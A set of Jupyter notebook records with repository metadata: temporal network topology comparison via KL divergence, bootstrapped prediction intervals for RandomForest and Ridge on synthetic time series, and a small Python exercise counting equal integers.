asp,ass,clust,stren,durat,s_met,new_conv,inter_indiv,den,nb_inter\n\ndef load_topo_original(file_name):\n den = np.load(\"topology_results/original_distributions/\"+file_name+\"/density.npy\",allow_pickle=True)\n clust = np.load(\"topology_results/original_distributions/\"+file_name+\"/clust.npy\",allow_pickle=True)\n asp = np.load(\"topology_results/original_distributions/\"+file_name+\"/asp.npy\",allow_pickle=True)\n nb_inter = np.load(\"topology_results/original_distributions/\"+file_name+\"/nb_interactions.npy\",allow_pickle=True)\n new_conv = np.load(\"topology_results/original_distributions/\"+file_name+\"/new_con.npy\",allow_pickle=True)\n ass = np.load(\"topology_results/original_distributions/\"+file_name+\"/ass.npy\",allow_pickle=True)\n s_met = np.load(\"topology_results/original_distributions/\"+file_name+\"/s_metric.npy\",allow_pickle=True)\n inter_indiv = np.load(\"topology_results/original_distributions/\"+file_name+\"/interacting_indiv.npy\",allow_pickle=True)\n stren = np.load(\"topology_results/original_distributions/\"+file_name+\"/streng.npy\",allow_pickle=True)\n durat = np.load(\"topology_results/original_distributions/\"+file_name+\"/dur.npy\",allow_pickle=True)\n \n return asp,ass,clust,stren,durat,s_met,new_conv,inter_indiv,den,nb_inter\n\n\ndef compute_counts(ro,e):\n counts = []\n e = np.array(e)\n for i in range(len(ro)-1):\n r1 = ro[i]\n r2 = ro[i+1]\n ee = e[e>r1]\n count = ee[ee<=r2]\n counts.append(len(count))\n return counts\n\ndef compute_multpile_counts(ranges,ee):\n counts = []\n for e in ee:\n counts.append(compute_counts(ranges,e))\n return counts\n\n# example of calculating the kl divergence between two mass functions\nfrom math import log2\n \n# calculate the kl divergence\ndef kl_divergence_max(d2, d1):\n \n max_len = max(len(d1),len(d2))\n\n new_d1 = np.zeros(max_len)\n new_d1[:len(d1)] = d1\n\n new_d2 = np.zeros(max_len)\n new_d2[:len(d2)] = d2\n \n E = 0.0000001\n new_d1 = new_d1 + E\n new_d2 = new_d2 + E\n\n res = 0\n for i in range(max_len):\n d1 = new_d1[i]\n d2 = new_d2[i]\n \n if (d1 != 0) and (d2 != 0):\n res = res + (d1 * log2(d1/d2))\n \n return res",
"_____no_output_____"
]
],
[
[
"density = tag\nclust = orig\nasp = tag\nnb_inter = tag\nnew_conv = tag\nass = ori\ns_met = tag\ninter_indiv = tag\nstren = tag\ndur = tag",
"_____no_output_____"
]
],
[
[
"def compute_ks_all_metrics(nb_bins,file_name):\n res_etn = []\n res_tag = []\n res_stm = []\n res_dym = []\n o_in = load_topo_original(file_name)\n e_in = load_topo_distributions(\"etngen\",file_name)\n t_in = load_topo_distributions(\"taggen\",file_name)\n d_in = load_topo_distributions(\"dymgen\",file_name)\n s_in = load_topo_distributions(\"stmgen\",file_name)\n\n all_res = []\n for i in range(10):\n\n o = o_in[i]\n e = e_in[i]\n t = t_in[i]\n d = d_in[i]\n s = s_in[i]\n\n #if i == 1 or i == 5 or i == 6:\n biggest_dist = o[0]\n #else:\n #biggest_dist = np.max(t)\n\n tc,tranges = np.histogram(biggest_dist,bins=nb_bins)\n\n oc = compute_counts(tranges,o)\n ec = compute_multpile_counts(tranges,e)\n dc = compute_multpile_counts(tranges,d)\n tc = compute_multpile_counts(tranges,t)\n sc = compute_multpile_counts(tranges,s)\n\n\n oc = oc/np.sum(oc)\n ec = [np.array(x)/sum(x) for x in ec]\n dc = [np.array(x)/sum(x) for x in dc]\n tc = [np.array(x)/sum(x) for x in tc]\n sc = [np.array(x)/sum(x) for x in sc]\n\n\n\n ec_kl = []\n tc_kl = []\n sc_kl = []\n dc_kl = []\n for i in ec:\n ec_kl.append(kl_divergence_max(i,oc))\n for i in tc:\n tc_kl.append(kl_divergence_max(i,oc))\n for i in dc:\n dc_kl.append(kl_divergence_max(i,oc))\n for i in sc:\n sc_kl.append(kl_divergence_max(i,oc))\n\n\n maximum_for_nome = max(np.nanmax(ec_kl),np.nanmax(tc_kl),np.nanmax(sc_kl),np.nanmax(dc_kl))\n ec_kl = ec_kl/maximum_for_nome\n tc_kl = tc_kl/maximum_for_nome\n sc_kl = sc_kl/maximum_for_nome\n dc_kl = dc_kl/maximum_for_nome\n\n res = [[np.nanmean(ec_kl),np.nanstd(ec_kl)],[np.nanmean(tc_kl),np.nanstd(tc_kl)],\n [np.nanmean(sc_kl),np.nanstd(sc_kl)],[np.nanmean(dc_kl),np.nanstd(dc_kl)]]\n \n res_etn.append([np.nanmean(ec_kl),np.nanstd(ec_kl)])\n res_tag.append([np.nanmean(tc_kl),np.nanstd(tc_kl)])\n res_stm.append([np.nanmean(sc_kl),np.nanstd(sc_kl)])\n res_dym.append([np.nanmean(dc_kl),np.nanstd(dc_kl)])\n\n if False:\n plt.figure(figsize=(15,5))\n plt.subplot(1,5,1)\n plt.bar(range(nb_bins),oc)\n plt.title(\"orig\")\n plt.subplot(1,5,2)\n plt.bar(range(nb_bins),ec[0])\n plt.title(\"etn\\n\"+str(res[0])[0:5])\n plt.subplot(1,5,3)\n plt.bar(range(nb_bins),tc[0])\n plt.title(\"tag\\n\"+str(res[1])[0:5])\n plt.subplot(1,5,4)\n plt.bar(range(nb_bins),sc[0])\n plt.title(\"stm\\n\"+str(res[2])[0:5])\n plt.subplot(1,5,5)\n plt.bar(range(nb_bins),dc[0])\n plt.title(\"diam\\n\"+str(res[3])[0:5])\n plt.show()\n\n #res2 = []\n\n #ooo = o[0]/np.sum(o[0])\n #eee = e[0]/np.sum(e[0])\n #ttt = t[0]/np.sum(t[0])\n #sss = s[0]/np.sum(s[0])\n #ddd = d[0]/np.sum(d[0])\n\n #res2.append(kl_divergence_max(ooo,eee))\n #res2.append(kl_divergence_max(ooo,ttt))\n #res2.append(kl_divergence_max(ooo,sss))\n #res2.append(kl_divergence_max(ooo,ddd))\n #if False:\n # plt.figure(figsize=(15,5))\n # plt.subplot(1,5,1)\n # plt.hist(o[0],bins=10)\n # plt.title(\"orig\")\n # plt.subplot(1,5,2)\n # plt.hist(e[0],bins=10)\n # plt.title(\"etn\\n\"+str(res2[0])[0:5])\n # plt.subplot(1,5,3)\n # plt.hist(t[0],bins=10)\n # plt.title(\"tag\\n\"+str(res2[1])[0:5])\n # plt.subplot(1,5,4)\n # plt.hist(s[0],bins=10)\n # plt.title(\"stm\\n\"+str(res2[2])[0:5])\n # plt.subplot(1,5,5)\n # plt.hist(d[0],bins=10)\n # plt.title(\"diam\\n\"+str(res2[3])[0:5])\n # plt.show()\n\n return [np.array(res_etn),np.array(res_tag),np.array(res_stm),np.array(res_dym)]",
"_____no_output_____"
],
[
"\n\nORIGINAL_COLOR = '#474747' #dark grey\nETN_COLOR = '#fb7041' #'#E5865E' # arancio\nTAG_COLOR = '#96ccc8' # light blue\nSTM_COLOR = '#bad1f2' #8F2E27' # rosso\nDYM_COLOR = '#559ca6' # teal\n\n\nline_width = 1.5",
"_____no_output_____"
],
[
"idx =[2, 5, 1, 8, 9, 6, 4, 3, 0, 7]\ntmp= [\"Density\",\n \"Global clustering \\ncoefficient\",\n \"Average shortest\\npath length\",\n \"Interacting\\nindividuals\",\n \"New conversations\",\n \"Assortativity\",\n \"S-metric\", \n \"Number of interactions\",\n \"Edge strength\",\n \"Duration of contacts\"]\n\ntmp = np.array(tmp)",
"_____no_output_____"
],
[
"labels = tmp[idx]",
"_____no_output_____"
],
[
"import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nnb_bins = 50\n\n\nx1,x2,x3,x4 = compute_ks_all_metrics(nb_bins,\"LH10\")\n\n\nx = np.arange(10) # the label locations\nwidth = 0.2 # the width of the bars\n\n\nfig, ax = plt.subplots(1,3,figsize=(12,10))\nfig.tight_layout(pad=-4)\n\n\nerror_bar_style = dict(ecolor=ORIGINAL_COLOR, alpha=0.8, lw=1.5, capsize=3, capthick=1)\n\nax[0].title.set_text(\"Hospital\")\nrects1 = ax[0].barh(x + 0.3, x1[:,0], width, xerr=x1[:,1],label='ETN-gen',color=ETN_COLOR, error_kw=error_bar_style)\nrects2 = ax[0].barh(x + 0.1, x2[:,0], width, xerr=x2[:,1],label='STM',color=STM_COLOR, error_kw=error_bar_style)\nrects3 = ax[0].barh(x - 0.1, x3[:,0], width, xerr=x3[:,1],label='TagGen',color=TAG_COLOR, error_kw=error_bar_style)\nrects4 = ax[0].barh(x - 0.3, x4[:,0], width, xerr=x4[:,1],label='Dymond',color=DYM_COLOR,error_kw=error_bar_style)\n\n\n\nx1,x2,x3,x4 = compute_ks_all_metrics(nb_bins,\"InVS13\")\nax[1].title.set_text(\"Workplace\")\n\nrects1 = ax[1].barh(x + 0.3, x1[:,0], width, xerr=x1[:,1],label='ETN-gen',color=ETN_COLOR, error_kw=error_bar_style)\nrects2 = ax[1].barh(x + 0.1, x2[:,0], width, xerr=x2[:,1],label='STM',color=STM_COLOR, error_kw=error_bar_style)\nrects3 = ax[1].barh(x - 0.1, x3[:,0], width, xerr=x3[:,1],label='TagGen',color=TAG_COLOR, error_kw=error_bar_style)\nrects4 = ax[1].barh(x - 0.3, x4[:,0], width, xerr=x4[:,1],label='Dymond',color=DYM_COLOR,error_kw=error_bar_style)\n\n\nx1,x2,x3,x4 = compute_ks_all_metrics(nb_bins,\"High_School11\")\nax[2].title.set_text(\"High school\")\nrects1 = ax[2].barh(x + 0.3, x1[:,0], width, xerr=x1[:,1],label='ETN-gen',color=ETN_COLOR, error_kw=error_bar_style)\nrects2 = ax[2].barh(x + 0.1, x2[:,0], width, xerr=x2[:,1],label='STM',color=STM_COLOR, error_kw=error_bar_style)\nrects3 = ax[2].barh(x - 0.1, x3[:,0], width, xerr=x3[:,1],label='TagGen',color=TAG_COLOR, error_kw=error_bar_style)\nrects4 = ax[2].barh(x - 0.3, x4[:,0], width, xerr=x4[:,1],label='Dymond',color=DYM_COLOR,error_kw=error_bar_style)\n\n\nax[0].set_yticklabels(labels)\nax[0].set_yticks(x)\nax[0].set_xlim(0,1)\n\nax[1].set_yticks(x)\nax[1].set_yticklabels([\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \"],rotation=0)\nax[1].set_xlim(0,1)\n\nax[2].set_yticks(x)\nax[2].set_xlim(0,1)\nax[2].set_yticklabels([\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \",\" \"],rotation=0)\n\nax[2].set_xticks([0,0.33,0.66,1])\nax[2].set_xticklabels([\"0.0\",\"0.33\",\"0.66\",\"1.0\"])\nax[1].set_xticks([0,0.33,0.66,1])\nax[1].set_xticklabels([\"0.0\",\"0.33\",\"0.66\",\"1.0\"])\nax[0].set_xticks([0,0.33,0.66,1])\nax[0].set_xticklabels([\"0.0\",\"0.33\",\"0.66\",\"1.0\"])\n\n\nax[0].tick_params(bottom=True, right=False,left=False)\nax[0].set_axisbelow(True)\nax[0].xaxis.grid(True, color='#b3b3b3')\nax[0].yaxis.grid(False)\n\nax[1].tick_params(bottom=True, right=False,left=False)\nax[1].set_axisbelow(True)\nax[1].xaxis.grid(True, color='#b3b3b3')\nax[1].yaxis.grid(False)\n\nax[2].tick_params(bottom=True, right=False,left=False)\nax[2].set_axisbelow(True)\nax[2].xaxis.grid(True, color='#b3b3b3')\nax[2].yaxis.grid(False)\n\n\n\nax[0].spines['top'].set_visible(False)\nax[0].spines['right'].set_visible(False)\nax[0].spines['left'].set_visible(False)\nax[0].spines['bottom'].set_visible(False)\n\n\n\nax[1].spines['top'].set_visible(False)\nax[1].spines['right'].set_visible(False)\nax[1].spines['left'].set_visible(False)\nax[1].spines['bottom'].set_visible(False)\n\n\nax[2].spines['top'].set_visible(False)\nax[2].spines['right'].set_visible(False)\nax[2].spines['left'].set_visible(False)\nax[2].spines['bottom'].set_visible(False)\n\n\nax[0].legend(loc='upper right',ncol = 5,bbox_to_anchor=(1, -0.05))\n\nfig.tight_layout()\nplt.savefig(\"topology_main_kld_test1.pdf\", bbox_inches = 'tight')\nplt.show()",
"<ipython-input-109-b439b330c2a3>:37: RuntimeWarning: invalid value encountered in true_divide\n dc = [np.array(x)/sum(x) for x in dc]\n<ipython-input-116-34fe7df1eebd>:45: UserWarning: FixedFormatter should only be used together with FixedLocator\n ax[0].set_yticklabels(labels)\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"raw",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"raw"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb4fd8110a35f430d4958036f17350c37b728a43 | 245,049 | ipynb | Jupyter Notebook | notebooks/train_raw_gan.ipynb | mrquincle/latent_3d_points | 97440587485c28442f79bc98b474e5d9852efa52 | [
"MIT"
] | 1 | 2021-03-19T17:20:58.000Z | 2021-03-19T17:20:58.000Z | notebooks/train_raw_gan.ipynb | mrquincle/latent_3d_points | 97440587485c28442f79bc98b474e5d9852efa52 | [
"MIT"
] | null | null | null | notebooks/train_raw_gan.ipynb | mrquincle/latent_3d_points | 97440587485c28442f79bc98b474e5d9852efa52 | [
"MIT"
] | 1 | 2019-02-11T15:15:58.000Z | 2019-02-11T15:15:58.000Z | 671.367123 | 40,826 | 0.939681 | [
[
[
"empty"
]
]
] | [
"empty"
] | [
[
"empty"
]
] |
cb4fd91d115f7c1475ad94b035ae2a86972073f8 | 651,058 | ipynb | Jupyter Notebook | Prediction_Intervals/Prediction_Intervals.ipynb | MugiPham/MEDIUM_NoteBook | 799b146469c99d8a94ab8684beb78271eec73cfb | [
"MIT"
] | 1 | 2022-03-02T14:31:08.000Z | 2022-03-02T14:31:08.000Z | Prediction_Intervals/Prediction_Intervals.ipynb | MugiPham/MEDIUM_NoteBook | 799b146469c99d8a94ab8684beb78271eec73cfb | [
"MIT"
] | null | null | null | Prediction_Intervals/Prediction_Intervals.ipynb | MugiPham/MEDIUM_NoteBook | 799b146469c99d8a94ab8684beb78271eec73cfb | [
"MIT"
] | null | null | null | 607.897292 | 119,796 | 0.947317 | [
[
[
"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom sklearn.ensemble import *\nfrom sklearn.linear_model import *\nfrom sklearn.model_selection import train_test_split, GridSearchCV, cross_val_predict",
"_____no_output_____"
],
[
"### UTILITY FUNCTION FOR DATA GENERATION ###\n\ndef gen_sinusoidal(timesteps, amp, freq, noise):\n \n X = np.arange(timesteps)\n e = np.random.normal(0,noise, (timesteps,))\n y = amp*np.sin(X*(2*np.pi/freq))+e\n \n return y\n\n\ndef gen_randomwalk(timesteps, noise):\n\n y = np.random.normal(0,noise, (timesteps,))\n \n return y.cumsum()",
"_____no_output_____"
],
[
"### CREATE SYNTHETIC DATA ###\n\nnp.random.seed(0)\n\ntimesteps = 1000\n\ndata1 = gen_sinusoidal(timesteps=timesteps, amp=10, freq=24, noise=5)\ndata2 = gen_sinusoidal(timesteps=timesteps, amp=10, freq=24*7, noise=5)\ndata3 = gen_randomwalk(timesteps=timesteps, noise=1)",
"_____no_output_____"
]
],
[
[
"# STATIONARY DATA",
"_____no_output_____"
]
],
[
[
"### STORE DATA IN DF ###\n\ndata = data1 + data2\n\ndf = pd.DataFrame({\n 'X1':data1,\n 'X2':data2,\n 'Y':data\n})\n\ndf.index = pd.date_range('2021', periods=timesteps, freq='H')\ncols = df.columns\n\nprint(df.shape)\ndf.head()",
"(1000, 3)\n"
],
[
"### PLOT SYNTHETIC DATA ###\n\nplt.figure(figsize=(16,4))\n\nfor i,c in enumerate(cols[:-1]):\n \n plt.subplot(1,2,i+1)\n df[c].plot(ax=plt.gca(), title=c, color='blue'); plt.xlabel(None)\n\nplt.figure(figsize=(16,4))\ndf['Y'].plot(title='Y', color='red')",
"_____no_output_____"
],
[
"### CREATE ROLLING FEATURES ###\n\nlags = [6, 12, 18, 24]\n\nfor l in lags:\n for c in cols:\n df[f\"{c}_mean_t-{l}\"] = df[c].rolling(l).mean()\n df[f\"{c}_std_t-{l}\"] = df[c].rolling(l).std()\n\ndf['Y'] = df['Y'].shift(-1)\ndf.drop(cols[cols.str.startswith('X')], axis=1, inplace=True)\ndf.dropna(inplace=True)",
"_____no_output_____"
],
[
"### TRAIN TEST SPLIT ###\n\nX_train, X_test, y_train, y_test = train_test_split(\n df.drop('Y', axis=1), df['Y'], \n test_size=24*7*2, shuffle=False)\n\nX_train.shape, X_test.shape",
"_____no_output_____"
],
[
"### RANDOM FOREST TUNING ###\n\nmodel = GridSearchCV(estimator=RandomForestRegressor(random_state=33), \n param_grid={'max_depth': [8, 10, 12, None], 'n_estimators': [20, 30, 40]}, \n scoring='neg_mean_squared_error', cv=3, refit=True)\nmodel.fit(X_train, y_train)\n\nmodel.best_params_",
"_____no_output_____"
],
[
"### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###\n\npred_train = cross_val_predict(RandomForestRegressor(**model.best_params_, random_state=33), \n X_train, y_train, cv=3)\n\nres = y_train - pred_train",
"_____no_output_____"
],
[
"### PLOT RESIDUAL STATISTICS ###\n\nplt.figure(figsize=(16,5))\n\nplt.subplot(1,2,1)\nplt.title('Residuals Distribution')\nplt.hist(res, bins=20)\n\nplt.subplot(1,2,2)\nplt.title('Residuals Autocorrelation')\nplt.plot([res.autocorr(lag=dt) for dt in range(1,200)])\nplt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')\nplt.ylabel('Autocorrelation'); plt.xlabel('Lags')\n\nplt.show()",
"_____no_output_____"
],
[
"### BOOTSTRAPPED INTERVALS ###\n\nalpha = 0.05\n\nbootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])\nq_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)\n\ny_pred = pd.Series(model.predict(X_test), index=X_test.index)\ny_lower = y_pred + q_bootstrap[0].mean()\ny_upper = y_pred + q_bootstrap[1].mean()",
"_____no_output_____"
],
[
"### PLOT BOOTSTRAPPED PREDICTION INTERVALS ###\n\nplt.figure(figsize=(10,6))\n\ny_pred.plot(linewidth=3)\ny_test.plot(style='.k', alpha=0.5)\nplt.fill_between(y_pred.index, y_lower, y_upper, alpha=0.3)\nplt.title('RandomForest test predictions')",
"_____no_output_____"
],
[
"### HOW MANY OUTLIERS IN TEST DATA ###\n\n((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]",
"_____no_output_____"
],
[
"### RIDGE TUNING ###\n\nmodel = GridSearchCV(estimator=Ridge(), param_grid={'alpha': [3, 5, 10, 20, 50]}, \n scoring='neg_mean_squared_error', cv=3, refit=True)\nmodel.fit(X_train, y_train)\n\nmodel.best_params_",
"_____no_output_____"
],
[
"### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###\n\npred_train = cross_val_predict(Ridge(**model.best_params_), X_train, y_train, cv=3)\n\nres = y_train - pred_train",
"_____no_output_____"
],
[
"### PLOT RESIDUAL STATISTICS ###\n\nplt.figure(figsize=(16,5))\n\nplt.subplot(1,2,1)\nplt.title('Residuals Distribution')\nplt.hist(res, bins=20)\n\nplt.subplot(1,2,2)\nplt.title('Residuals Autocorrelation')\nplt.plot([res.autocorr(lag=dt) for dt in range(1,200)])\nplt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')\nplt.ylabel('Autocorrelation'); plt.xlabel('Lags')\n\nplt.show()",
"_____no_output_____"
],
[
"### BOOTSTRAPPED INTERVALS ###\n\nalpha = 0.05\n\nbootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])\nq_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)\n\ny_pred = pd.Series(model.predict(X_test), index=X_test.index)\ny_lower = y_pred + q_bootstrap[0].mean()\ny_upper = y_pred + q_bootstrap[1].mean()",
"_____no_output_____"
],
[
"### PLOT BOOTSTRAPPED PREDICTION INTERVALS ###\n\nplt.figure(figsize=(10,6))\n\ny_pred.plot(linewidth=3)\ny_test.plot(style='.k', alpha=0.5)\nplt.fill_between(y_pred.index, y_lower, y_upper, alpha=0.3)\nplt.title('Ridge test predictions')",
"_____no_output_____"
],
[
"### HOW MANY OUTLIERS IN TEST DATA ###\n\n((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]",
"_____no_output_____"
]
],
[
[
"# NOT STATIONARY DATA",
"_____no_output_____"
]
],
[
[
"### STORE DATA IN DF ###\n\ndata = data1 + data2 + data3\n\ndf = pd.DataFrame({\n 'X1':data1,\n 'X2':data2,\n 'X3':data3,\n 'Y':data\n})\n\ndf.index = pd.date_range('2021', periods=timesteps, freq='H')\ncols = df.columns\n\nprint(df.shape)\ndf.head()",
"(1000, 4)\n"
],
[
"### PLOT SYNTHETIC DATA ###\n\nplt.figure(figsize=(16,11))\n\nfor i,c in enumerate(cols):\n \n color = 'red' if c == 'Y' else 'blue'\n \n plt.subplot(2,2,i+1)\n df[c].plot(ax=plt.gca(), title=c, color=color); plt.xlabel(None)",
"_____no_output_____"
],
[
"### CREATE ROLLING FEATURES ###\n\nlags = [6, 12, 18, 24]\n\nfor l in lags:\n for c in cols:\n df[f\"{c}_mean_t-{l}\"] = df[c].rolling(l).mean()\n df[f\"{c}_std_t-{l}\"] = df[c].rolling(l).std()\n\ndf['Y'] = df['Y'].shift(-1)\ndf.drop(cols[cols.str.startswith('X')], axis=1, inplace=True)\ndf.dropna(inplace=True)",
"_____no_output_____"
],
[
"### TRAIN TEST SPLIT ###\n\nX_train, X_test, y_train, y_test = train_test_split(\n df.drop('Y', axis=1), df['Y'], \n test_size=24*7*2, shuffle=False)\n\nX_train.shape, X_test.shape",
"_____no_output_____"
],
[
"### RANDOM FOREST TUNING ###\n\nmodel = GridSearchCV(estimator=RandomForestRegressor(random_state=33), \n param_grid={'max_depth': [8, 10, 12, None], 'n_estimators': [20, 30, 40]}, \n scoring='neg_mean_squared_error', cv=3, refit=True)\nmodel.fit(X_train, y_train)\n\nmodel.best_params_",
"_____no_output_____"
],
[
"### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###\n\npred_train = cross_val_predict(RandomForestRegressor(**model.best_params_, random_state=33), \n X_train, y_train, cv=3)\n\nres = y_train - pred_train",
"_____no_output_____"
],
[
"### PLOT RESIDUAL STATISTICS ###\n\nplt.figure(figsize=(16,5))\n\nplt.subplot(1,2,1)\nplt.title('Residuals Distribution')\nplt.hist(res, bins=20)\n\nplt.subplot(1,2,2)\nplt.title('Residuals Autocorrelation')\nplt.plot([res.autocorr(lag=dt) for dt in range(1,200)])\nplt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')\nplt.ylabel('Autocorrelation'); plt.xlabel('Lags')\n\nplt.show()",
"_____no_output_____"
],
[
"### BOOTSTRAPPED INTERVALS ###\n\nalpha = 0.05\n\nbootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])\nq_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)\n\ny_pred = model.predict(X_test)\ny_lower = y_pred + q_bootstrap[0].mean()\ny_upper = y_pred + q_bootstrap[1].mean()",
"_____no_output_____"
],
[
"### HOW MANY OUTLIERS IN TEST DATA ###\n\n((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]",
"_____no_output_____"
],
[
"### RIDGE TUNING ###\n\nmodel = GridSearchCV(estimator=Ridge(), param_grid={'alpha': [3, 5, 10, 20, 50]}, \n scoring='neg_mean_squared_error', cv=3, refit=True)\nmodel.fit(X_train, y_train)\n\nmodel.best_params_",
"_____no_output_____"
],
[
"### OUT-OF-FOLDS RESIDUAL DISTRIBUTION ###\n\npred_train = cross_val_predict(Ridge(**model.best_params_), X_train, y_train, cv=3)\n\nres = y_train - pred_train",
"_____no_output_____"
],
[
"### PLOT RESIDUAL STATISTICS ###\n\nplt.figure(figsize=(16,5))\n\nplt.subplot(1,2,1)\nplt.title('Residuals Distribution')\nplt.hist(res, bins=20)\n\nplt.subplot(1,2,2)\nplt.title('Residuals Autocorrelation')\nplt.plot([res.autocorr(lag=dt) for dt in range(1,200)])\nplt.ylim([-1,1]); plt.axhline(0, c='black', linestyle='--')\nplt.ylabel('Autocorrelation'); plt.xlabel('Lags')\n\nplt.show()",
"_____no_output_____"
],
[
"### BOOTSTRAPPED INTERVALS ###\n\nalpha = 0.05\n\nbootstrap = np.asarray([np.random.choice(res, size=res.shape) for _ in range(100)])\nq_bootstrap = np.quantile(bootstrap, q=[alpha/2, 1-alpha/2], axis=0)\n\ny_pred = pd.Series(model.predict(X_test), index=X_test.index)\ny_lower = y_pred + q_bootstrap[0].mean()\ny_upper = y_pred + q_bootstrap[1].mean()",
"_____no_output_____"
],
[
"### PLOT BOOTSTRAPPED PREDICTION INTERVALS ###\n\nplt.figure(figsize=(10,6))\n\ny_pred.plot(linewidth=3)\ny_test.plot(style='.k', alpha=0.5)\nplt.fill_between(y_pred.index, y_lower, y_upper, alpha=0.3)\nplt.title('Ridge test predictions')",
"_____no_output_____"
],
[
"### HOW MANY OUTLIERS IN TEST DATA ###\n\n((y_test > y_upper).sum() + (y_test < y_lower).sum()) / y_test.shape[0]",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb4fdbcca9dde9b1eb5cea7d686de930109bcd68 | 6,759 | ipynb | Jupyter Notebook | Python Exercise 2/NM_58101_Python_Exercise_2_Hizon.ipynb | TiffanyHizon/58101_Numerical_Methods | 5bf2928db2c9b92d8037d1fd15da224f05714903 | [
"Apache-2.0"
] | null | null | null | Python Exercise 2/NM_58101_Python_Exercise_2_Hizon.ipynb | TiffanyHizon/58101_Numerical_Methods | 5bf2928db2c9b92d8037d1fd15da224f05714903 | [
"Apache-2.0"
] | null | null | null | Python Exercise 2/NM_58101_Python_Exercise_2_Hizon.ipynb | TiffanyHizon/58101_Numerical_Methods | 5bf2928db2c9b92d8037d1fd15da224f05714903 | [
"Apache-2.0"
] | null | null | null | 23.14726 | 287 | 0.389111 | [
[
[
"<a href=\"https://colab.research.google.com/github/TiffanyHizon/58101_Numerical_Methods/blob/main/Python%20Exercise%202/NM_58101_Python_Exercise_2_Hizon.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"## **Matrix and its Operations**",
"_____no_output_____"
],
[
"Create a NumPy program that performs the operations of the given matrices:\n1. Sum = A + B\n2. Difference1 = B - A\n3. Difference2 = A - B\n\n$$A = \\begin{bmatrix} -5&0\\\\4&1 \\\\\\end{bmatrix} ,\n B = \\begin{bmatrix} 6 & -3 \\\\ 2 & 3 \\\\\\end{bmatrix} \\\\ $$",
"_____no_output_____"
]
],
[
[
"import numpy as np",
"_____no_output_____"
],
[
"A = np.array([\n [-5, 0],\n [4, 1]\n ])\nB = np.array([\n [6, -3],\n [2, 3]\n ])",
"_____no_output_____"
]
],
[
[
"**Addition**",
"_____no_output_____"
]
],
[
[
"#Eager Execution\n\nSum = A + B\nSum",
"_____no_output_____"
],
[
"#Functional Method\n\nSum = np.add(A, B)\nSum",
"_____no_output_____"
]
],
[
[
"**Subtraction - Difference 1**",
"_____no_output_____"
]
],
[
[
"#Eager Execution\n\nDifference1 = B - A\nDifference1",
"_____no_output_____"
],
[
"#Functional Method\n\nDifference1 = np.subtract(B, A)\nDifference1",
"_____no_output_____"
]
],
[
[
"**Subtraction - Difference 2**\n",
"_____no_output_____"
]
],
[
[
"#Eager Execution\n\nDifference2 = A - B\nDifference2",
"_____no_output_____"
],
[
"#Functional Method\n\nDifference2 = np.subtract(A, B)\nDifference2",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb4ff9d69eb9d3bb4719c799fb5c5b321dbba392 | 7,051 | ipynb | Jupyter Notebook | Python Programming Basic Assignment - Assignment25.ipynb | VaheC/Python_assigments | 9a46c19128d43fabd112983477d0dfed3639984a | [
"MIT"
] | null | null | null | Python Programming Basic Assignment - Assignment25.ipynb | VaheC/Python_assigments | 9a46c19128d43fabd112983477d0dfed3639984a | [
"MIT"
] | null | null | null | Python Programming Basic Assignment - Assignment25.ipynb | VaheC/Python_assigments | 9a46c19128d43fabd112983477d0dfed3639984a | [
"MIT"
] | null | null | null | 25.547101 | 111 | 0.46348 | [
[
[
"**Question1**\n<br>Create a function that takes three integer arguments (a, b, c) and returns the amount of\nintegers which are of equal value.\n<br>Examples\n<br>equal(3, 4, 3) ➞ 2\n<br>equal(1, 1, 1) ➞ 3\n<br>equal(3, 4, 1) ➞ 0\n<br>\n<br>Notes\n<br>Your function must return 0, 2 or 3.",
"_____no_output_____"
],
[
"**Answer:**",
"_____no_output_____"
]
],
[
[
"def equal(a, b, c):\n from collections import Counter\n temp_dict = dict(Counter([a, b, c]))\n temp_list = [temp_dict[i] for i in temp_dict if temp_dict[i]>1]\n if len(temp_list) == 0:\n return 0\n else:\n return temp_list[0]\n \nfor a, b, c in [(3, 4, 3), (1, 1, 1), (3, 4, 1)]:\n print(equal(a, b, c))",
"2\n3\n0\n"
]
],
[
[
